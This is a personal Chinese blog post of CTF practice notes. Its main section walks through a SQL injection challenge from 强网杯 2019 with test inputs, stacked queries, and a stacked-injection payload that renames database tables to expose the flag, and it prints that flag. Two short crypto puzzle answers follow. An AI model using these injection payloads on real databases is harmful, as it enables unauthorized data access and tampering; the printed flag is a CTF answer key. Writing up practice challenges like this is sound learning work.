文章 分类 评论
147 1 60

站点介绍

此处是站点介绍

CTF 练习 22.1.21

dayi 2022-01-21 889 0条评论 默认分类

首页 / 正文

22.1.21

喵喵喵喵喵喵,今天买了5900x!!有新的服务器用啦!

0x01 [强网杯 2019]随便注

  1. 测试

    '1' or 1=1
    MariaDB server version for the right syntax to use near '1' or 1=1'' at line 
    都有显示。
    
        
        
        
    index.php?inject=' or '1'='1
    显示
    
    array(2) {
      [0]=>
      string(1) "1"
      [1]=>
      string(7) "hahahah"
    }
    
    array(2) {
      [0]=>
      string(1) "2"
      [1]=>
      string(12) "miaomiaomiao"
    }
    
    array(2) {
      [0]=>
      string(6) "114514"
      [1]=>
      string(2) "ys"
    }
    1. 其实这里是看了WP的
    ';show tables;
    
    查看words
    ';show columns from words;
    查看另外一个
    ';show columns from `1919810931114514`;
    
    看到了flag
    
    但是好像是不能查询的
    
    下这是一个payload,不是我写的。
    1';alter table `1919810931114514` add(id int NULL);rename table `words` to `xiaohua`;rename table `1919810931114514` to `words`;
    
    直接把库名给重命名换过来。
    '1'='1
    
     string(42) "flag{52e30ed9-fd07-4aef-a28d-27d4d4eaf871}"
     
     

0x02 buu crypto 信息化时代的步伐

6060计 4615算 2623机 6008要 1783从 1216娃 1216娃 2119抓 6386起

0x03 buu crypto 萌萌哒的八戒

  1. 猪圈密码。
  2. 慢慢点可以得到whenthepigwanttoeat

评论(0)

热门文章

最新评论

  • 阳光灿烂

    我问小狗遇到心事怎么办, 小狗说忘忘忘。

  • 阳光灿烂

    研表究明,汉字的序顺并不定一能影阅响读,比如当你看完这句话后,才发这现里的字全是都乱的。

  • qrpxbutnkw

    这篇文章不错!

  • riekozuuqu

    这篇文章不错!

  • kijvmoxsgz

    作者的情感表达细腻入微,让人在阅读中找到了心灵的慰藉。

  • mruinannnb

    作者以简洁明了的语言,传达了深刻的思想和情感。

  • ixoqqxzijt

    在现有基础上可尝试多媒介形式呈现。

  • lvuqvjoznv

    文化底蕴深厚,引经据典信手拈来。

  • moczqjpzpu

    若能补充常见问题解答,会更具实用性。

  • sdxzopdbyg

    配图与文字相辅相成,直观易懂。

日历

2025年10月

   1234
567891011
12131415161718
19202122232425
262728293031 

友情链接

文章目录

推荐关键字: ctf docker linux 密码学 BUU BUU ctf XCTF 作业